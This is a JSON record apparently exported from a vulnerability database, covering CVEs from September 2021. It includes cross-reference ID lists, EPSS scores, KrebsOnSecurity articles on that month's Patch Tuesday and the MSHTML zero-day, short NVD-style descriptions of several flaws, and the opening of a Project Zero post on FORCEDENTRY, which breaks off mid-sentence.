"KLA12284", "KLA12286", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0A7B79D902F4C3089D6602A5A3520EDF", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-30632", "MS:CVE-2021-36965", "MS:CVE-2021-38647", "MS:CVE-2021-40444"]}, {"type": "mskb", "idList": ["KB5005563"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["APPLE_IOS_1255_CHECK.NBIN", "APPLE_IOS_148_CHECK.NBIN", "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DSA-4972.NASL", "FREEBSD_PKG_47B571F2157B11ECAE98704D7B472482.NASL", "GENTOO_GLSA-202201-02.NASL", "GOOGLE_CHROME_93_0_4577_82.NASL", "MACOSX_GOOGLE_CHROME_93_0_4577_82.NASL", "MACOS_HT212804.NASL", "MACOS_HT212805.NASL", "MICROSOFT_EDGE_CHROMIUM_93_0_961_47.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "OPENSUSE-2021-1273.NASL", "OPENSUSE-2021-1300.NASL", "OPENSUSE-2021-1303.NASL", "OPENSUSE-2021-3044.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SUSE_SU-2021-3044-1.NASL", "SUSE_SU-2021-3180-1.NASL", "UBUNTU_USN-5075-1.NASL", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165214"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:1EBCA555F1E846ACB6207A523F56D750", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:C8139A26F9F7474D197CBF36F4F05D3D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3781"]}, {"type": "saint", "idList": ["SAINT:B21EB0CE85BB4A8171AF59A4CF014F01"]}, {"type": "securelist", "idList": ["SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1273-1", "OPENSUSE-SU-2021:1300-1", "OPENSUSE-SU-2021:1303-1", "OPENSUSE-SU-2021:3044-1"]}, {"type": "thn", "idList": ["THN:080602C4CECD29DACCA496697978CAD0", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2741F0E9DD9F764C60701C9C81F231C5", "THN:3691EA68445933ED72DD1B52F712F791", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:6A9CD6F085628D08978727C0FF597535", "THN:919B3D59F2A9DE80FF2DC5F8833E4831", "THN:C4188C7A44467E425407D33067C14094", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E72737D2B8E842D4AB9BD4F993737BD9", "THN:F076354512CA34C263F222F3D62FCB1E"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:1A88FF1D2951B8467D062697D5D05CFA", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:958AA77BA7D3A5325FEB47A5DE036F1C", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "ubuntu", "idList": ["USN-5075-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-30632", "UB:CVE-2021-3781"]}, {"type": "zdt", "idList": ["1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-36967", "1337DAY-ID-37126"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30632", "epss": "0.893050000", "percentile": "0.981180000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30860", "epss": "0.001200000", "percentile": "0.445650000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36965", "epss": "0.013190000", "percentile": "0.838930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-3781", "epss": "0.011040000", "percentile": "0.822360000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38647", "epss": "0.974860000", "percentile": "0.999410000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993300000", "modified": "2023-03-17"}], "vulnersScore": 0.0}, "_state": {"dependencies": 1660004461, "score": 1684009192, "epss": 1679112172}, "_internal": {"score_hash": "c8aed2ee86be5816a18c6977de05c297"}}

{"krebs": [{"lastseen": "2021-09-26T09:25:20", "description": "**Microsoft** today pushed software updates to plug dozens of security holes in Windows and related products, including a vulnerability that is already being exploited in active attacks. Also, **Apple** has issued an emergency update to fix a flaw that's reportedly been abused to install spyware on **iOS** products, and **Google**'s got a new version of **Chrome** that tackles two zero-day flaws. Finally, Adobe has released critical security updates for **Acrobat**, **Reader** and a slew of other software.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nFour of the flaws fixed in this patch batch earned Microsoft's most-dire "critical" rating, meaning they could be exploited by miscreants or malware to remotely compromise a Windows PC with little or no help from the user.\n\nTop of the critical heap is [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), which affects the \u201cMSHTML\u201d component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. In [a security advisory last week](<https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/>), Microsoft warned attackers already are exploiting the flaw through **Microsoft Office** applications as well as IE.\n\nThe critical bug [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>) is interesting, as it involves a remote code execution flaw in "WLAN AutoConfig," the component in Windows 10 and many Server versions that handles auto-connections to Wi-Fi networks. One mitigating factor here is that the attacker and target would have to be on the same network, although many systems are configured to auto-connect to Wi-Fi network names with which they have previously connected.\n\n**Allan Liska**, senior security architect at [Recorded Future](<https://www.recordedfuture.com>), said a similar vulnerability -- [CVE-2021-28316](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28316>) -- was announced in April.\n\n"CVE-2021-28316 was a security bypass vulnerability, not remote code execution, and it has never been reported as publicly exploited," Liska said. "That being said, the ubiquity of systems deployed with WLAN AutoConfig enabled could make it an attractive target for exploitation."\n\nAnother critical weakness that enterprises using Azure should prioritize is [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>), which is a remote code execution bug in Azure Open Management Infrastructure (OMI) that has a CVSS Score of 9.8 (10 is the worst). It was [reported and detailed](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) by researchers at **Wiz.io**, who said CVE-2021-38647 was one of four bugs in Azure OMI they found that Microsoft patched this week.\n\n"We conservatively estimate that thousands of Azure customers and millions of endpoints are affected," Wiz.io's [Nir Ohfeld](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>) wrote. "In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk."\n\nKevin** Breen** of [Immersive Labs](<https://www.immersivelabs.com/>) calls attention to several "privilege escalation" flaws fixed by Microsoft this month, noting that while these bugs carry lesser severity ratings, Microsoft considers them more likely to be exploited by bad guys and malware.\n\n"[CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>) have also been listed as 'exploitation more likely' and together cover the full range of supported Windows versions," Breem wrote. "I am starting to feel like a broken record when talking about privilege escalation vulnerabilities. They typically have a lower CVSS score than something like Remote Code Execution, but these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker. If you can block them here you have the potential to significantly limit their damage. If we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching these is even more important than patching some other Remote Code execution vulnerabilities."\n\nApple on Monday pushed out [an urgent security update](<https://support.apple.com/en-us/HT212807>) to fix a "zero-click" iOS vulnerability ([CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>)) reported by researchers at **Citizen Lab** that allows commands to be run when files are opened on certain Apple devices. [Citizen Lab found](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) that an exploit for CVE-2021-30860 was being used by the [NSO Group](<https://en.wikipedia.org/wiki/NSO_Group>), an Israeli tech company whose spyware enables the remote surveillance of smartphones.\n\n**Google** also released [a new version](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) of its **Chrome** browser on Monday to fix nine vulnerabilities, including two that are under active attack. If you're running Chrome, keep a lookout for when you see an "Update" tab appear to the right of the address bar. If it's been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAs it usually does on Patch Tuesday, Adobe also released new versions of Reader, Acrobat and [a large number of other products](<https://helpx.adobe.com/security.html>). Adobe says it is not aware of any exploits in the wild for any of the issues addressed in its updates today.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/september-2021-its-patch-day/>) usually has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-14T21:00:42", "type": "krebs", "title": "Microsoft Patch Tuesday, September 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28316", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-14T21:00:42", "id": "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "href": "https://krebsonsecurity.com/2021/09/microsoft-patch-tuesday-september-2021-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T09:25:19", "description": "**Microsoft Corp.** warns that attackers are exploiting a previously unknown vulnerability in **Windows 10** and many **Windows Server** versions to seize control over PCs when users open a malicious document or visit a booby-trapped website. There is currently no official patch for the flaw, but Microsoft has released recommendations for mitigating the threat.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/09/ms-bldg.png)\n\nAccording to [a security advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) from Redmond, the security hole [CVE-2021-40444](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) affects the "MSHTML" component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. IE been slowly abandoned for more recent Windows browsers like **Edge**, but the same vulnerable component also is used by **Microsoft Office** applications for rendering web-based content.\n\n"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine," Microsoft wrote. "The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."\n\nMicrosoft has not yet released a patch for CVE-2021-40444, but says users can mitigate the threat from this flaw by disabling the installation of all ActiveX controls in IE. Microsoft says the vulnerability is currently being used in targeted attacks, although its advisory credits three different entities with reporting the flaw.\n\nOn of the researchers credited -- **EXPMON** -- [said on Twitter](<https://twitter.com/EXPMON_/status/1435310341689331721>) that it had reproduced the attack on the latest Office 2019 / Office 365 on Windows 10.\n\n"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous)," EXPMON tweeted.\n\nWindows users could see an official fix for the bug as soon as September 14, when Microsoft is slated to release its monthly "Patch Tuesday" bundle of security updates.\n\nThis year has been a tough one for Windows users and so-called "zero day" threats, which refers to vulnerabilities that are not patched by current versions of the software in question, and are being actively exploited to break into vulnerable computers.\n\nVirtually every month in 2021 so far, Microsoft has been forced to respond to zero-day threats targeting huge swaths of its user base. In fact, by my count May was the only month so far this year that Microsoft didn't release a patch to fix at least one zero-day attack in Windows or supported software.\n\nMany of those zero-days involve older Microsoft technologies or those that have been retired, like IE11; Microsoft [officially retired support for Microsoft Office 365 apps and services on IE11](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/microsoft-365-apps-say-farewell-to-internet-explorer-11-and/ba-p/1591666>) last month. In July, Microsoft [rushed out a fix for the Print Nightmare vulnerability](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) that was present in every supported version of Windows, only to see the patch cause problems for a number of Windows users.\n\nOn June's Patch Tuesday, Microsoft [addressed six zero-day security holes](<https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/>). And of course in March, hundreds of thousands of organizations running **Microsoft Exchange** email servers found those systems [compromised with backdoors thanks to four zero-day flaws in Exchange](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>).", "cvss3": {}, "published": "2021-09-08T15:03:45", "type": "krebs", "title": "Microsoft: Attackers Exploiting Windows Zero-Day Flaw", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T15:03:45", "id": "KREBS:409088FC2DFC219B74043104C2B672CC", "href": "https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-16T06:34:26", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36965", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "id": "PRION:CVE-2021-36965", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:34", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38647", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-38647", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T03:05:22", "description": "An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T19:15:00", "type": "prion", "title": "CVE-2021-30860", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2022-09-30T15:05:00", "id": "PRION:CVE-2021-30860", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30860", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:40:29", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T19:15:00", "type": "prion", "title": "CVE-2021-3781", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2023-06-26T18:56:00", "id": "PRION:CVE-2021-3781", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T07:11:26", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40444", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "id": "PRION:CVE-2021-40444", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:30:09", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "prion", "title": "CVE-2021-26084", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-26084", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T03:04:06", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T21:15:00", "type": "prion", "title": "CVE-2021-30632", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2021-30632", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2023-05-28T02:00:29", "description": "Posted by Ian Beer & Samuel Gro\u00df of Google Project Zero\n\nWe want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple\u2019s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero\u2019s and do not necessarily reflect those of the organizations we collaborated with during 